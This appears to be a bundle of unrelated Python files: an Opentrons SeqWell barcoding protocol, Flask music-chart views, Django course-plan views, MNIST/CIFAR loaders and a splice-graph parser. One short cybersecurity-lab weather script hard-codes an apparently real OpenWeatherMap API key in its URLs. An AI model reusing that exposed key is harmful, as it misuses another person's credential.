    event.text.type = sdl2.SDL_TEXTINPUT
    event.text.text = char.encode('utf-8')
    return event
def queue_event(e):
    """Push event *e* onto the SDL event queue, raising ValueError on failure."""
    if sdl2.SDL_PushEvent(byref(e)) != 1:
        raise ValueError("Unable to add event to queue.")
|
#PB Reaction and purification Protocol 8/9
#last update: October 30, 2020
#Seqwell Workflow
import math
from opentrons import types
# Opentrons protocol metadata (displayed in the app; apiLevel selects the
# Protocol API version used by run()).
metadata = {
    'protocolName': 'SeqWell - Pooled Barcoding and Purification',
    'author': 'Chaz <chaz@opentrons.com>',
    'source': 'Custom Protocol Request',
    'apiLevel': '2.3'
}
# Number of sample pools to process; validated at the top of run().
NUM_POOL = 16  # this should be between 1 and 16
def run(protocol):
    """SeqWell pooled barcoding and purification (steps 5-7) on an OT-2.

    *protocol* is the opentrons ProtocolContext (apiLevel 2.3). The module
    constant NUM_POOL (1-16) selects how many pools are processed.
    """
    # load labware, modules, and pipettes
    tips20 = [protocol.load_labware(
        'opentrons_96_filtertiprack_20ul', s) for s in ['5', '10']]
    tips200 = [protocol.load_labware(
        'opentrons_96_filtertiprack_200ul', s) for s in [
            '7', '8', '9', '11']]
    p20 = protocol.load_instrument(
        'p20_single_gen2', 'right', tip_racks=tips20)
    m300 = protocol.load_instrument(
        'p300_multi_gen2', 'left', tip_racks=tips200)
    tempdeck = protocol.load_module('temperature module gen2', '4')
    magdeck = protocol.load_module('magnetic module gen2', '6')
    pcr_strips = protocol.load_labware(
        'opentrons_96_aluminumblock_generic_pcr_strip_200ul',
        # 'nest_96_wellplate_100ul_pcr_full_skirt',
        '1', 'PCR Strips')
    thermo_strips = protocol.load_labware(
        'opentrons_96_aluminumblock_generic_pcr_strip_200ul',
        # 'nest_96_wellplate_100ul_pcr_full_skirt',
        '2', 'Thermocycler + Destination Strips')
    al_block24 = tempdeck.load_labware(
        'opentrons_24_aluminumblock_nest_0.5ml_screwcap', 'PB Reagents')
    # 'opentrons_24_aluminumblock_nest_1.5ml_snapcap', 'PB Reagents')
    deep_plate = magdeck.load_labware('nest_96_wellplate_2ml_deep')
    reservoir = protocol.load_labware('usascientific_12_reservoir_22ml', '3')
    if NUM_POOL < 1 or NUM_POOL > 16:
        raise Exception('Number of Pools must be between 1 and 16.')
    # Pools are handled 8 per column by the multi-channel pipette.
    num_col = math.ceil(NUM_POOL/8)
    tempdeck.set_temperature(4)
    p20.flow_rate.aspirate = 7.6
    p20.flow_rate.dispense = 7.6
    p20.flow_rate.blow_out = 100
    m300.flow_rate.aspirate = 100
    m300.flow_rate.dispense = 200
    m300.flow_rate.blow_out = 500
    """
    ~~~ 5. Pool Barcoding (PB) Reaction Setup ~~~
    """
    protocol.comment('Beginning Step 5. Pool Barcoding Reaction Setup...')
    # Add 5ul of PB Reagent to each SB tube
    pb_reagents = al_block24.wells()[:NUM_POOL]
    init_sb = pcr_strips.wells()[80:80+NUM_POOL]
    protocol.comment('Adding 5uL of PB reagent to each SB tube.')
    for pb, dest in zip(pb_reagents, init_sb):
        p20.pick_up_tip()
        p20.aspirate(5, pb)
        p20.touch_tip()
        p20.air_gap(3)
        p20.dispense(8, dest)
        p20.mix(5, 20, dest)
        p20.touch_tip()
        p20.blow_out()
        p20.drop_tip()
    # Add 22ul of Coding Buffer to PCR tube containing SB pool
    coding_buffer = pcr_strips['A1']
    init_row = pcr_strips.rows()[0][10:10+num_col]
    protocol.comment('Adding 22uL of Coding Buffer to each SB tube.')
    for sb in init_row:
        m300.pick_up_tip()
        # Slower flow rates for the viscous buffer; restored below.
        m300.flow_rate.aspirate = 25
        m300.flow_rate.dispense = 50
        m300.aspirate(22, coding_buffer)
        m300.air_gap(10)
        m300.dispense(32, sb)
        m300.mix(2, 60, sb)
        m300.flow_rate.aspirate = 100
        m300.flow_rate.dispense = 200
        m300.blow_out()
        m300.drop_tip()
    protocol.pause('Step 5 complete. Please cap PCR tubes containing PB '
                   'reaction and run TAG program on thermal cycler. After '
                   'TAG program, return strips to deck and click RESUME to '
                   'begin Step 6.')
    """
    ~~~ 6. PB Reaction Stop ~~~
    """
    protocol.comment('Beginning Step 6. PB Reaction Stop...')
    # Add 31uL of X solution to each PB Reaction
    x_solution = [pcr_strips[pos] for pos in ['A2', 'A3']]
    pb_react = [
        [thermo_strips['A1'], thermo_strips['A2']],
        [thermo_strips['A3'], thermo_strips['A4']]
    ][:num_col]
    protocol.comment('Splitting up sample.')
    for src, dest in zip(init_row, pb_react):
        m300.pick_up_tip()
        m300.aspirate(66, src)
        for d in dest:
            m300.dispense(33, d)
        m300.blow_out()
        m300.drop_tip()
    protocol.comment('Adding 31uL of X solution to each reaction tube.')
    for x, pb_dest in zip(x_solution, pb_react):
        for pb in pb_dest:
            m300.pick_up_tip()
            m300.aspirate(31, x)
            m300.air_gap(10)
            m300.dispense(41, pb)
            m300.flow_rate.aspirate = 25
            m300.flow_rate.dispense = 50
            m300.mix(5, 50, pb)
            m300.blow_out()
            m300.drop_tip()
            m300.flow_rate.aspirate = 100
            m300.flow_rate.dispense = 200
    # MESSAGE FIX: corrected 'containging' typo and the wrong program name
    # ('After TAG program' -> 'After STOP program'; step 6 runs STOP).
    protocol.pause('Step 6 complete. Please cap PCR tubes containing PB '
                   'reaction and run STOP program on thermal cycler. After '
                   'STOP program, return strips to deck and click RESUME to '
                   'begin Step 7.')
    """
    ~~~ 7. PB Reaction Purification ~~~
    """
    protocol.comment('Beginning Step 7. PB Reaction Purification...')
    magwise = reservoir['A1']
    etoh = reservoir['A2']
    tris = reservoir['A3']
    liq_waste = reservoir['A12']
    # Alternate sides of the well so the tip avoids the bead pellet.
    side_vars = [-1, 1]

    def deep_mix(reps, vol, loc, side):
        """Function for improved mixing of magbeads in deep well"""
        loc1 = loc.bottom().move(types.Point(x=side, y=0, z=0.6))
        alt_mix = side * -1
        loc2 = loc.bottom().move(types.Point(x=alt_mix, y=0, z=1))
        for _ in range(reps):
            m300.aspirate(vol, loc1)
            m300.dispense(vol, loc2)

    def supernatant_removal(vol, loc, side):
        """Function for removal of supernatant"""
        m300.flow_rate.aspirate = 20
        extra_vol = 0
        while vol > 200:
            m300.aspirate(
                180, loc.bottom().move(types.Point(x=side, y=0, z=0.5)))
            m300.dispense(180, liq_waste.top(-3))
            m300.aspirate(10, liq_waste.top())
            vol -= 180
            extra_vol += 10
        m300.aspirate(
            vol, loc.bottom().move(types.Point(x=side, y=0, z=0.5)))
        m300.dispense(vol+extra_vol, liq_waste.top(-3))
        m300.flow_rate.aspirate = 100

    protocol.comment('Adding 99uL of MAGwise to deep well plate')
    mag_samps = deep_plate.rows()[0][:num_col]
    m300.pick_up_tip()
    m300.mix(10, 200, magwise)
    for m in mag_samps:
        m300.aspirate(99, magwise)
        m300.air_gap(10)
        m300.dispense(109, m)
        m300.blow_out()
    m300.drop_tip()
    protocol.comment('Adding PB reaction to deep well plate.')
    for tube, samp, s in zip(pb_react, mag_samps, side_vars):
        m300.pick_up_tip()
        for t in tube:
            m300.aspirate(64, t)
            m300.air_gap(20)
        m300.dispense(148, samp)
        deep_mix(10, 180, samp, s)
        m300.blow_out()
        m300.drop_tip()
    protocol.comment('Incubating to allow DNA to bind.')
    protocol.delay(minutes=5)
    protocol.comment('Engaging MagDeck')
    magdeck.engage(height=13.7)
    protocol.comment('Waiting for bead pellet to form.')
    protocol.delay(minutes=3)
    protocol.comment('Removing supernatant.')
    for samp, s in zip(mag_samps, side_vars):
        m300.pick_up_tip()
        supernatant_removal(227, samp, s)
        m300.drop_tip()
    for idx in range(1, 3):
        protocol.comment('Ethanol wash %d:' % idx)
        protocol.comment('Adding 300ul of ethanol.')
        for samp in mag_samps:
            m300.pick_up_tip()
            m300.flow_rate.dispense = 50
            m300.aspirate(150, etoh)
            m300.dispense(150, samp.bottom(5))
            m300.aspirate(150, etoh)
            m300.dispense(150, samp.bottom(5))
            m300.drop_tip()
            m300.flow_rate.dispense = 200
        protocol.comment('Incubating for 30 seconds.')
        protocol.delay(seconds=30)
        protocol.comment('Removing supernatant.')
        for samp, s in zip(mag_samps, side_vars):
            m300.pick_up_tip()
            supernatant_removal(320, samp, s)
            m300.drop_tip()
    protocol.comment('Adding 24uL of 10mM Tris to bead pellets.')
    magdeck.disengage()
    for samp, s in zip(mag_samps, side_vars):
        m300.pick_up_tip()
        m300.aspirate(24, tris)
        m300.air_gap(10)
        m300.dispense(34, samp)
        deep_mix(10, 30, samp, s)
        m300.blow_out()
        m300.drop_tip()
    protocol.comment('Incubating to allow DNA to elute.')
    protocol.delay(minutes=5)
    protocol.comment('Engaging MagDeck')
    magdeck.engage(height=13.7)
    protocol.comment('Waiting for bead pellet to form.')
    protocol.delay(minutes=2)
    final_tube = thermo_strips.rows()[0][10:10+num_col]
    protocol.comment('Transferring elution to PCR tubes.')
    m300.flow_rate.aspirate = 20
    for src, dest, side in zip(mag_samps, final_tube, side_vars):
        m300.pick_up_tip()
        m300.aspirate(23, src.bottom().move(types.Point(x=side, y=0, z=0.5)))
        m300.dispense(23, dest)
        m300.blow_out()
        m300.drop_tip()
    protocol.comment('Protocol complete! Proceed immediately to next step '
                     '(library amplification) or store purified PB reaction '
                     'at -20C.')
|
#Practica 2 Laboratorio de Ciberseguridad
import requests
import json
# Collected JSON responses, one per API call below.
output = []
def call(url):
    """GET *url* and return the JSON-decoded response body."""
    r = requests.get(url)
    return (json.loads(r.content))
# Fetch current weather by city name, by city id, and by lat/lon.
# NOTE(review): the OpenWeatherMap API key is hard-coded in these URLs;
# move it to an environment variable before publishing this file.
output.append(call("https://api.openweathermap.org/data/2.5/weather?q=London&units=metric&appid=4c35b48c9218dc4d08cd6eede31f455d"))
output.append(call("https://api.openweathermap.org/data/2.5/weather?id=2172797&appid=4c35b48c9218dc4d08cd6eede31f455d"))
output.append(call("https://api.openweathermap.org/data/2.5/weather?lat=35&lon=139&appid=4c35b48c9218dc4d08cd6eede31f455d"))
# Dump each response as one line of text.
with open("pract2.txt","w+") as txt:
    for i in output:
        txt.write(str(i)+"\n")
|
import datetime
from flask import render_template, request
from flask_login import current_user, login_required
from sqlalchemy import func
from scrobbler import app, db
from scrobbler.models import Scrobble
from scrobbler.webui.consts import PERIODS
from scrobbler.webui.helpers import range_to_datetime
from scrobbler.webui.views import blueprint
def get_chart_params(period):
    """Parse chart querystring args into a params dict.

    Resolves *period* against PERIODS (falling back to '1w'), reads
    from/to/count from the request, and flags whether a custom range
    was supplied.
    """
    period, days = PERIODS.get(period, PERIODS['1w'])
    count = int(request.args.get('count', app.config['RESULTS_COUNT']))
    raw_from = request.args.get('from')
    raw_to = request.args.get('to')
    if raw_from is None or raw_to is None:
        # No explicit range: default to the last `days` days.
        custom_range = False
        time_from = datetime.datetime.now() - datetime.timedelta(days=days)
        time_to = datetime.datetime.now()
    else:
        custom_range = True
        time_from, time_to = range_to_datetime(raw_from, raw_to)
    return {
        'period': period,
        'days': days,
        'time_from': time_from,
        'time_to': time_to,
        'custom_range': custom_range,
        'count': count,
    }
@blueprint.route("/top/artists/")
@blueprint.route("/top/artists/<period>/")
@login_required
def top_artists(period=None):
    """Render the current user's most-scrobbled artists for the period."""
    params = get_chart_params(period)
    play_count = func.count(Scrobble.artist).label('count')
    query = (
        db.session.query(Scrobble.artist, play_count)
        .filter(
            Scrobble.user_id == current_user.id,
            Scrobble.played_at >= params['time_from'],
            Scrobble.played_at <= params['time_to'],
        )
        .group_by(Scrobble.artist)
        .order_by(play_count.desc())
        .limit(params['count'])
    )
    chart = query.all()
    top_count = chart[0][1] if chart else 0
    return render_template(
        'charts/top_artists.html',
        chart=enumerate(chart, start=1),
        max_count=top_count,
        **params
    )
@blueprint.route("/top/tracks/")
@blueprint.route("/top/tracks/<period>/")
@login_required
def top_tracks(period=None):
    """Render the current user's most-scrobbled tracks for the period."""
    params = get_chart_params(period)
    scrobbles = func.count(Scrobble.artist).label('count')
    chart = (
        db.session.query(Scrobble.artist, Scrobble.track, scrobbles)
        # BUG FIX: `Scrobble.user_id == current_user.id` was previously
        # passed to group_by(); it is a filter condition (already applied
        # below), not a grouping column. Group only by artist and track,
        # consistent with top_yearly_tracks.
        .group_by(Scrobble.artist, Scrobble.track)
        .filter(
            Scrobble.user_id == current_user.id,
            Scrobble.played_at >= params['time_from'],
            Scrobble.played_at <= params['time_to'],
        )
        .order_by(scrobbles.desc())
        .limit(params['count'])
        .all()
    )
    return render_template(
        'charts/top_tracks.html',
        chart=enumerate(chart, start=1),
        max_count=chart[0][2] if chart else 0,
        **params
    )
@blueprint.route("/top/yearly/tracks/")
@login_required
def top_yearly_tracks():
    """Render per-year top-track charts with year-over-year position deltas.

    Builds an (artist, track, count) chart for each year of the user's
    history, then marks each title's movement versus the previous year,
    or 'new' if it never appeared in any earlier year's chart.
    """
    scrobbles = func.count(Scrobble.artist).label('count')
    charts = {}
    col_year = func.extract('year', Scrobble.played_at)
    # First and last year with any scrobbles for this user.
    year_from, year_to = (
        db.session.query(func.min(col_year), func.max(col_year))
        .filter(Scrobble.user_id == current_user.id)
        .first()
    )
    # Track many positions internally so deltas are accurate, but the
    # template only shows show_count rows.
    stat_count = 10000
    show_count = 100
    if not year_from or not year_to:
        # No scrobbles at all: render an empty page.
        return render_template(
            'charts/top_yearly_tracks.html',
            charts={},
            position_changes={},
            show_count=show_count,
        )
    year_from, year_to = int(year_from), int(year_to)
    for year in range(year_from, year_to + 1):
        time_from = datetime.datetime(year, 1, 1)
        time_to = datetime.datetime(year, 12, 31, 23, 59, 59, 999999)
        charts[year] = (
            db.session.query(Scrobble.artist, Scrobble.track, scrobbles)
            .filter(
                Scrobble.user_id == current_user.id,
                Scrobble.played_at >= time_from,
                Scrobble.played_at <= time_to
            )
            .group_by(Scrobble.artist, Scrobble.track)
            .order_by(scrobbles.desc())
            .limit(stat_count)
            .all()
        )
    position_changes = {}
    for year in range(year_from + 1, year_to + 1):
        # "Artist – Track" -> 1-based chart position, this year and last.
        chart = {
            '{} – {}'.format(artist, track): position
            for position, (artist, track, scrobbles) in enumerate(charts[year], 1)
        }
        prev_chart = {
            '{} – {}'.format(artist, track): position
            for position, (artist, track, scrobbles) in enumerate(charts[year - 1], 1)
        }
        # Titles seen in ANY earlier year (to distinguish 'new' entries).
        prev_charts = (
            chart for chart_year, chart in charts.items() if chart_year < year
        )
        prev_tracks = {
            '{} – {}'.format(artist, track)
            for chart in prev_charts
            for (artist, track, scrobbles) in chart
        }
        if year not in position_changes:
            position_changes[year] = {}
        for title in chart:
            if title in prev_chart:
                # Positive delta means the title climbed since last year.
                position_changes[year][title] = prev_chart[title] - chart[title]
            elif title not in prev_tracks:
                position_changes[year][title] = 'new'
    charts = sorted(charts.items())
    return render_template(
        'charts/top_yearly_tracks.html',
        charts=charts,
        position_changes=position_changes,
        show_count=show_count,
    )
@blueprint.route("/top/yearly/artists/")
@login_required
def top_yearly_artists():
    """Render per-year top-artist charts with year-over-year position deltas.

    Mirrors top_yearly_tracks but keyed on artist only: build an
    (artist, count) chart per year, then mark each artist's movement
    versus the previous year, or 'new' if never charted before.
    """
    scrobbles = func.count(Scrobble.artist).label('count')
    charts = {}
    col_year = func.extract('year', Scrobble.played_at)
    # First and last year with any scrobbles for this user.
    year_from, year_to = (
        db.session.query(func.min(col_year), func.max(col_year))
        .filter(Scrobble.user_id == current_user.id)
        .first()
    )
    stat_count = 1000
    show_count = 100
    if not year_from or not year_to:
        return render_template(
            'charts/top_yearly_artists.html',
            charts={},
            position_changes={},
            show_count=show_count,
        )
    year_from, year_to = int(year_from), int(year_to)
    for year in range(year_from, year_to + 1):
        time_from = datetime.datetime(year, 1, 1)
        time_to = datetime.datetime(year, 12, 31, 23, 59, 59, 999999)
        charts[year] = (
            db.session.query(Scrobble.artist, scrobbles)
            .filter(
                Scrobble.user_id == current_user.id,
                Scrobble.played_at >= time_from,
                Scrobble.played_at <= time_to
            )
            .group_by(Scrobble.artist)
            .order_by(scrobbles.desc())
            .limit(stat_count)
            .all()
        )
    position_changes = {}
    for year in range(year_from + 1, year_to + 1):
        chart = {artist: position for position, (artist, scrobbles) in enumerate(charts[year], 1)}
        prev_chart = {
            artist: position for position, (artist, scrobbles) in enumerate(charts[year - 1], 1)
        }
        prev_charts = (chart for chart_year, chart in charts.items() if chart_year < year)
        prev_artists = {artist for chart in prev_charts for (artist, scrobbles) in chart}
        if year not in position_changes:
            position_changes[year] = {}
        # FIX: previously iterated chart.items() binding an unused `data`
        # variable; only the keys are needed here.
        for artist in chart:
            if artist in prev_chart:
                position_changes[year][artist] = prev_chart[artist] - chart[artist]
            elif artist not in prev_artists:
                position_changes[year][artist] = 'new'
    charts = sorted(charts.items())
    return render_template(
        'charts/top_yearly_artists.html',
        charts=charts,
        position_changes=position_changes,
        show_count=show_count,
    )
|
from django.apps import AppConfig
class GithubAuthConfig(AppConfig):
    """Django app configuration for the ``apps.github_auth`` application."""
    name = "apps.github_auth"
|
from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from django.core import serializers
from app1.models import *
import json
import datetime
from app1.comm.utils import *
def addTeachPlans(request):
    """Create a TeachPlan from a POSTed JSON body and return all plans.

    Expected body: {"data": {"cid", "gra", "cri", "teadate", "checktype"}}.
    Any exception (bad JSON, missing keys, unknown course/grade) is
    returned as an error payload via showJsonerror.
    NOTE(review): a non-POST request falls through the `if` and returns
    None, which Django rejects — confirm callers only ever POST here.
    """
    try:
        if(request.method=='POST'):
            resdata=json.loads(request.body)
            data=resdata["data"]
            co=data["cid"]           # course number (Course.cno)
            gr=data["gra"]           # grade number (Grade.gno)
            cr=data["cri"]           # credit
            tedate=data["teadate"]   # teaching date
            check=data["checktype"]  # exam/check type
            # Raise if the referenced course/grade do not exist.
            kco=Course.objects.get(cno=co)
            kgr=Grade.objects.get(gno=gr)
            result=TeachPlan()
            result.course=kco
            result.grade=kgr
            result.credit=cr
            result.teach_date=tedate
            result.checkType=check
            result.save()
            # Respond with the full (updated) plan list.
            result=TeachPlan.objects.all().values()
            return showJsonresult(result)
    except Exception as e:
        response={}
        response['msg']=str(e)
        response['err_num']=1
        return showJsonerror(response)
def showTeachPlans(request):
    """Return every TeachPlan row, serialized via showJsonresult."""
    plans = TeachPlan.objects.all().values()
    return showJsonresult(plans)
def updateTeachPlan(request):
    """Replace the TeachPlan for a course/grade pair from a POSTed JSON body.

    Implemented as delete-then-recreate: any existing plan rows matching
    the course and grade are removed, then a fresh row is saved.
    NOTE(review): like addTeachPlans, a non-POST request returns None.
    """
    try:
        if(request.method=='POST'):
            resdata=json.loads(request.body)
            data=resdata["data"]
            co=data["cid"]           # course number (Course.cno)
            gr=data["gra"]           # grade number (Grade.gno)
            cr=data["cri"]           # credit
            tedate=data["teadate"]   # teaching date
            check=data["checktype"]  # exam/check type
            # Remove any existing plan rows for this course/grade pair.
            kk=TeachPlan.objects.filter(course=co).filter(grade=gr).delete()
            kco=Course.objects.get(cno=co)
            kgr=Grade.objects.get(gno=gr)
            result=TeachPlan()
            result.course=kco
            result.grade=kgr
            result.credit=cr
            result.teach_date=tedate
            result.checkType=check
            result.save()
            # Respond with the full (updated) plan list.
            result=TeachPlan.objects.values().all()
            return showJsonresult(result)
    except Exception as e:
        response={}
        response['msg']=str(e)
        response['err_num']=1
        return showJsonerror(response)
def delTeachPlan(request):
    """Delete the TeachPlan identified by course id and grade id (POST).

    Expected body: {"data": {"cid", "gra"}}. Errors are returned via
    showJsonerror, matching the other views in this module.
    """
    try:
        if(request.method=='POST'):
            resdata=json.loads(request.body)
            data=resdata["data"]
            co=data["cid"]  # course number (Course.cno)
            gr=data["gra"]  # grade number (Grade.gno)
            # Validate that the referenced course and grade exist.
            kco=Course.objects.get(cno=co)
            kgr=Grade.objects.get(gno=gr)
            # BUG FIX: previously this deleted the Course row itself
            # (Course.objects.filter(cno=co).delete()). A plan-deletion
            # endpoint should remove the TeachPlan, mirroring the filter
            # used in updateTeachPlan.
            result=TeachPlan.objects.filter(course=co).filter(grade=gr).delete()
            return showJsonresult(result)
    except Exception as e:
        response={}
        response['msg']=str(e)
        response['err_num']=1
        return showJsonerror(response)
import sys
sys.path.append('..')
import numpy as np
import os
from time import time
from collections import Counter
import random
from matplotlib import pyplot as plt
import pickle
from lib.data_utils import shuffle
def mnist():
    """Load raw MNIST images/labels from $DATADIR/mnist.

    Returns (trX, teX, trY, teY): images flattened to 784-vectors
    (60000 train / 10000 test), labels as 1-D uint8 arrays.
    """
    data_dir = os.path.join(os.environ["DATADIR"], "mnist")

    def _read_idx(name, offset, shape):
        # IDX files are binary — FIX: they were previously opened in text
        # mode, which is incorrect for np.fromfile; the handles were also
        # never closed. Open 'rb' inside a context manager.
        with open(os.path.join(data_dir, name), 'rb') as fd:
            loaded = np.fromfile(file=fd, dtype=np.uint8)
        # `offset` skips the IDX header bytes (16 for images, 8 for labels).
        return loaded[offset:].reshape(shape)

    trX = _read_idx('train-images.idx3-ubyte', 16, (60000, 28*28))
    trY = _read_idx('train-labels.idx1-ubyte', 8, (60000,))
    teX = _read_idx('t10k-images.idx3-ubyte', 16, (10000, 28*28))
    teY = _read_idx('t10k-labels.idx1-ubyte', 8, (10000,))
    trY = np.asarray(trY)
    teY = np.asarray(teY)
    return trX, teX, trY, teY
def mnist_with_valid_set():
    """Load MNIST and carve a 10k validation split off the shuffled train set.

    Returns (trX, vaX, teX, trY, vaY, teY) with 50000 training samples.
    """
    trX, teX, trY, teY = mnist()
    trX, trY = shuffle(trX, trY)
    split = 50000
    vaX, vaY = trX[split:], trY[split:]
    trX, trY = trX[:split], trY[:split]
    return trX, vaX, teX, trY, vaY, teY
def cifar():
    """Load CIFAR-10 train/test batches from $DATADIR/cifar.

    Returns (trX, teX, trY, teY): images as (N, 3, 32, 32) uint8 arrays,
    labels as int32 arrays.
    """
    data_dir = os.path.join(os.environ["DATADIR"], "cifar/cifar-10-batches-py")

    def process_batch(fn):
        # Parse one pickled batch file into (images, labels).
        # FIX: use a context manager so the handle is closed even if
        # pickle.load raises (previously an explicit close could be skipped).
        with open(fn, 'rb') as fo:
            # latin1 decodes the Python 2-era pickles shipped with CIFAR-10.
            data_dict = pickle.load(fo, encoding="latin1")
        raw = data_dict["data"]
        images = raw.reshape((-1, 3, 32, 32))
        return images, np.array(data_dict["labels"], dtype=np.int32)

    trX, trY = [], []
    for i in range(1, 6):
        batch_name = os.path.join(data_dir, "data_batch_%d" % i)
        print(batch_name)
        images, labels = process_batch(batch_name)
        trX.append(images)
        trY.append(labels)
    trX = np.concatenate(trX)
    trY = np.concatenate(trY)
    teX, teY = process_batch(os.path.join(data_dir, "test_batch"))
    return trX, teX, trY, teY
def cifar3():
    """Load CIFAR batches from $DATADIR/cifar3 (same layout as cifar()).

    Returns (trX, teX, trY, teY): images as (N, 3, 32, 32) uint8 arrays,
    labels as int32 arrays.
    """
    data_dir = os.path.join(os.environ["DATADIR"], "cifar3/cifar-10-batches-py")

    def process_batch(fn):
        # FIX: pickle.load was called without an encoding; under Python 3
        # that fails (UnicodeDecodeError) on the Python 2-pickled CIFAR
        # batches. Use encoding="latin1", consistent with cifar() above,
        # and a context manager so the handle is always closed.
        with open(fn, 'rb') as fo:
            data_dict = pickle.load(fo, encoding="latin1")
        raw = data_dict["data"]
        images = raw.reshape((-1, 3, 32, 32))
        return images, np.array(data_dict["labels"], dtype=np.int32)

    trX, trY = [], []
    for i in range(1, 6):
        batch_name = os.path.join(data_dir, "data_batch_%d" % i)
        print(batch_name)
        images, labels = process_batch(batch_name)
        trX.append(images)
        trY.append(labels)
    trX = np.concatenate(trX)
    trY = np.concatenate(trY)
    teX, teY = process_batch(os.path.join(data_dir, "test_batch"))
    return trX, teX, trY, teY
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 27 2020
@author: Palash Sashittal
"""
import pysam
import pandas as pd
import numpy as np
import sys
import argparse
from typing import List, Dict, Tuple, Optional
from collections import Counter
import math
import itertools
#from jumper.segment_graph_aux import *
from splice_graph_aux import *
class solution():
    """Parse a solver output file of transcript paths into graph edges.

    The file alternates '>transcript_<i>'/'>path_<i>'/'>Path_<i>' header
    lines (with ':<abundance>') and edge lines 'left\tright\ttype'.
    '>transcript' headers refer to known graph transcripts by index;
    '>path'/'>Path' headers start a new edge list that is matched back to
    graph.edges. Optionally loads a path->phase-count matching file.
    NOTE(review): relies on graph.getPathIndex/graph.transcripts/graph.edges
    from the (project-local) splice graph class — confirm their contracts.
    """
    def __init__(self, graph, fname, matching_fname=None):
        self.graph = graph
        self.paths = []            # tuple of edges per accepted path
        self.path_abundances = []  # abundance per path (parallel list)
        self.path_indices = []     # solver path index per path (parallel)
        # flag is True while edge lines of a '>path' block are pending.
        flag = False
        with open(fname, 'r') as inp:
            for line in inp:
                if line.startswith('>transcript'):
                    if flag:
                        # Flush the previously accumulated '>path' block.
                        assert(self.graph.getPathIndex(path) == pathIndex)
                        self.paths.append(tuple(path))
                        self.path_abundances.append(pathAbundance)
                        self.path_indices.append(pathIndex)
                        path = []
                    # Header format: 'transcript_<idx>\t...:<abundance>'.
                    pathIndex = int(line.rstrip(
                        '\n').split('\t')[0].split('_')[1])
                    pathAbundance = float(line.rstrip('\n').split(':')[1])
                    # print(f"transcript {pathIndex} is drawn")
                    # Known transcript: copy its edges from the graph.
                    self.paths.append(tuple(self.graph.transcripts[pathIndex]))
                    self.path_abundances.append(pathAbundance)
                    self.path_indices.append(pathIndex)
                    flag = False
                elif line.startswith('>path') or line.startswith('>Path'):
                    if flag:
                        # Flush the previous '>path' block first.
                        assert(self.graph.getPathIndex(path) == pathIndex)
                        self.paths.append(tuple(path))
                        self.path_abundances.append(pathAbundance)
                        self.path_indices.append(pathIndex)
                    else:
                        flag = True
                    path = []
                    # Header format: 'path_<idx>:<abundance>'.
                    pathIndex = int(line.rstrip(
                        '\n').split(':')[0].split('_')[1])
                    pathAbundance = float(line.rstrip('\n').split(':')[1])
                elif flag:
                    # Edge line: resolve (left, right, type) to a graph edge.
                    data = line.rstrip('\n').split('\t')
                    left_node_name = data[0]
                    right_node_name = data[1]
                    edge_type = data[2]
                    curr_edge = [edge for edge in self.graph.edges if (edge.left.name == left_node_name and
                                                                       edge.right.name == right_node_name and
                                                                       edge.type == edge_type)]
                    # The (left, right, type) triple must be unique.
                    assert(len(curr_edge) == 1)
                    path.append(curr_edge[0])
            if flag:
                # Flush the final pending '>path' block.
                assert(self.graph.getPathIndex(path) == pathIndex)
                self.paths.append(tuple(path))
                self.path_abundances.append(pathAbundance)
                self.path_indices.append(pathIndex)
        self.npaths = len(self.paths)
        # path index -> abundance, as a Counter for arithmetic convenience.
        self.pathCounter = Counter(
            dict(zip(self.path_indices, self.path_abundances)))
        if matching_fname:
            # Optional file: '>..._<pathIndex>' headers followed by
            # 'phaseID\tcount' lines.
            self.matching = {}
            with open(matching_fname, 'r') as inp:
                for line in inp:
                    if line.startswith('>'):
                        pathIndex = int(line.rstrip('\n').split('_')[1])
                        self.matching[pathIndex] = {}
                    else:
                        data = line.rstrip('\n').split('\t')
                        phaseID = int(data[0])
                        count = int(data[1])
                        self.matching[pathIndex][phaseID] = count
class alternate_solution():
    """A candidate transcript assembly loaded from a jumper file or a GTF.

    Populates four parallel dicts keyed by transcript id:
      path_jump_dict       -> list of (left, right) splice jumps
      path_exon_dict       -> list of (start, end) exon intervals
      path_abundances_dict -> relative abundance (normalized)
      path_length_dict     -> summed exon length
    Coordinates run over 1..29903 (SARS-CoV-2 genome length).
    """
    def __init__(self, fname, gtf=False):
        # Dispatch on input format; gtf=True expects a GTF with RPKM/TPM tags.
        if gtf:
            self.read_gtf_file(fname)
        else:
            # self.read_gtf_file(fname)
            self.read_jumper_file(fname)
    def read_jumper_file(self, fname):
        """Parse a jumper-format file: '>name\\t...:abundance' headers followed
        by edge lines; only 'splice' edges contribute jumps."""
        self.path_jump_dict = {}
        self.path_abundances_dict = {}
        self.path_exon_dict = {}
        key = None
        with open(fname, 'r') as inp:
            for line in inp:
                if line.startswith('>'):
                    # Header: id is the first tab field, abundance after ':'.
                    key = line.rstrip('\n').split('>')[-1].split('\t')[0]
                    if key in self.path_jump_dict.keys():
                        raise Exception(f"repeated entries {key}")
                    else:
                        self.path_jump_dict[key] = []
                        self.path_abundances_dict[key] = float(
                            line.rstrip('\n').split(':')[1])
                else:
                    if not key:
                        raise Exception(f"no identifier found at line: {line}")
                    edgetype = line.rstrip('\n').split('\t')[-1]
                    if edgetype == 'splice':
                        # '[...,left]\t[right,...]\tsplice' -> jump (left, right).
                        left = int(line.split('\t')[0].split(
                            ',')[-1].rstrip(']'))
                        right = int(line.split('\t')[
                            1].split(',')[0].lstrip('['))
                        self.path_jump_dict[key].append((left, right))
        # remove 0 weight paths
        remove_keys = [
            k for k, v in self.path_abundances_dict.items() if v == 0]
        for key in remove_keys:
            del self.path_abundances_dict[key]
            del self.path_jump_dict[key]
        # Exons are the genome intervals between consecutive jumps.
        for key, val in self.path_jump_dict.items():
            self.path_exon_dict[key] = []
            if len(val) == 0:
                self.path_exon_dict[key].append((1, 29903))
            else:
                for idx in range(len(val)):
                    if idx == 0:
                        self.path_exon_dict[key].append((1, val[idx][0]))
                    else:
                        self.path_exon_dict[key].append(
                            (val[idx-1][-1], val[idx][0]))
                self.path_exon_dict[key].append((val[-1][-1], 29903))
        # Transcript length = sum of (inclusive) exon interval lengths.
        self.path_length_dict = {}
        for key, exons in self.path_exon_dict.items():
            self.path_length_dict[key] = 0
            for exon in exons:
                self.path_length_dict[key] += exon[1] - exon[0] + 1
    def read_gtf_file(self, fname):
        """Parse a GTF: 'transcript' rows define entries (RPKM or TPM
        required in the attribute column), other rows append exons.
        NOTE: relies on pandas being imported at module level as `pd`."""
        self.path_jump_dict = {}
        self.path_abundances_dict = {}
